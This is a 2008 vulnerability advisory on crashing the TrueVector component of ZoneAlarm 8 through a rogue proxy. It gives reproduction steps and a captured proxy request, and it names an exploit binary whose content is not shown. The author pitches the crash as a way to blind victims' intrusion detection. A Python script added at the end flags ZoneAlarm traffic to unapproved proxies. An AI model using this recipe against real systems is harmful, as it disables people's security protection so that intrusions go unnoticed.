Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)

2008-09-30T00:00:00
ID SECURITYVULNS:DOC:20625
Type securityvulns
Reporter Securityvulns
Modified 2008-09-30T00:00:00

Description


  • Keep ZoneAlarm 8 running with vsmon.exe running (it runs by default).

  • On System A: Run the rogue proxy (attached) za_crasher_proxy.exe and set a port number (e.g. za_crasher_proxy.exe 5938).

  • On System B: Use Internet Explorer 6 and set the proxy settings to the IP of System A and port 5938 for HTTP connections. By default IE 6 has its homepage set to http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome. Leave it unchanged.

  • Keep za_crasher_proxy.exe running on System A.

  • Launch IE on System B. It will go to http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome

  • Stop it and type any other web URL in the address bar. IE tries to locate that URL via the set proxy IP and port.

Sniffed Output :

    00000000  17 24 0A 20 00 1A A9 D8 81 88 13 80 00 00 00 00  .$. ............
    00000010  00 01 00 00 00 0F 00 00 00 00 00 00 00 00 00 00  ................
    00000020  00 00 00 00 00                                   .....

    CONNECT 208.185.174.65:443 HTTP/1.0
    Host: 208.185.174.65:443
    Proxy-Connection: Keep-Alive
    Accept-Encoding: gzip
    Accept: /
    Content-Type: text/plain
    User-Agent: ZoneAlarm/8.0.020.000 (oem-1025; en-US) ZSP/2.2

  • ZoneAlarm 8's TrueVector component crashes with a message box and leaves a minidump file in Temp; after the message box is closed, it restarts after a few moments.

  • ZoneAlarm leaves the system unprotected (HIDS module alone) until the TrueVector component is back.

  • Demonstration Video links :

http://www.fileden.com/files/2008/9/18/2104312/rogue_proxy_without_za8_running.rar

http://www.fileden.com/files/2008/9/18/2104312/rogue_proxy_crashing_za8issuite.rar

ZoneAlarm 8 Internet Security Suite Crasher (Rogue Proxy) crashes ZA8 on IE 6, Windows XP SP3.

Can be used as a rogue proxy (3128, 8080, etc.) to crash your victims' ZA HIDS component for a few moments, rendering your victim vulnerable to unnoticed, unlogged system changes.

[ Not tested with other browsers. Might work on IE7,8 and others. Seems to be a Browser Independent bug ]

za_crasher_proxy.b64 (Base64 Encoded File)


Discovered on 9:48 PM 9/8/2008

-- QUAKERDOOMER
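
A detection check for the scenario described above, added here and not part of the original advisory: it parses the first request a client sends to its proxy and flags requests carrying the ZoneAlarm User-Agent from the sniffed output when they go to a proxy outside an allowlist. The IP addresses, the allowlist, the flow tuple layout and the CRLF line endings in the sample are assumptions; port 5938 and the request text come from the page.

```python
# Added example: flag ZoneAlarm client requests that reach a non-approved proxy.
# Assumptions (not from the advisory): IP addresses, allowlist, flow tuple layout.
APPROVED_PROXIES = {("192.0.2.1", 3128)}   # constructed allowlist
AGENT_PREFIX = "ZoneAlarm/"                # User-Agent prefix seen in the capture

def parse_proxy_request(payload: bytes):
    """Return (method, target, headers) or None if payload is not an HTTP request."""
    head = payload.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers

def unapproved_zonealarm_flows(flows, approved=APPROVED_PROXIES):
    """flows: iterable of (client_ip, server_ip, server_port, first_payload)."""
    alerts = []
    for client, server, port, payload in flows:
        req = parse_proxy_request(payload)
        if req is None:
            continue                       # not HTTP, nothing to attribute
        method, target, headers = req
        agent = headers.get("user-agent", "")
        if agent.startswith(AGENT_PREFIX) and (server, port) not in approved:
            alerts.append({"client": client, "proxy": f"{server}:{port}",
                           "method": method, "target": target, "agent": agent})
    return alerts

# Constructed sample: request text from the sniffed output, CRLF endings assumed.
ZA_CONNECT = (b"CONNECT 208.185.174.65:443 HTTP/1.0\r\n"
              b"Host: 208.185.174.65:443\r\n"
              b"Proxy-Connection: Keep-Alive\r\n"
              b"User-Agent: ZoneAlarm/8.0.020.000 (oem-1025; en-US) ZSP/2.2\r\n\r\n")
SAMPLE_FLOWS = [
    ("192.0.2.20", "192.0.2.10", 5938, ZA_CONNECT),   # unknown proxy
    ("192.0.2.21", "192.0.2.1", 3128, ZA_CONNECT),    # approved proxy
    ("192.0.2.22", "192.0.2.10", 5938,
     b"GET http://example.com/ HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\n\r\n"),
    ("192.0.2.23", "192.0.2.10", 5938, b"\x16\x03\x01\x00\x05hello"),
]

if __name__ == "__main__":
    for alert in unapproved_zonealarm_flows(SAMPLE_FLOWS):
        print(alert)
```

A hit means a host running ZoneAlarm has its HTTP proxy pointed at an endpoint outside the allowlist, which is the precondition the advisory relies on.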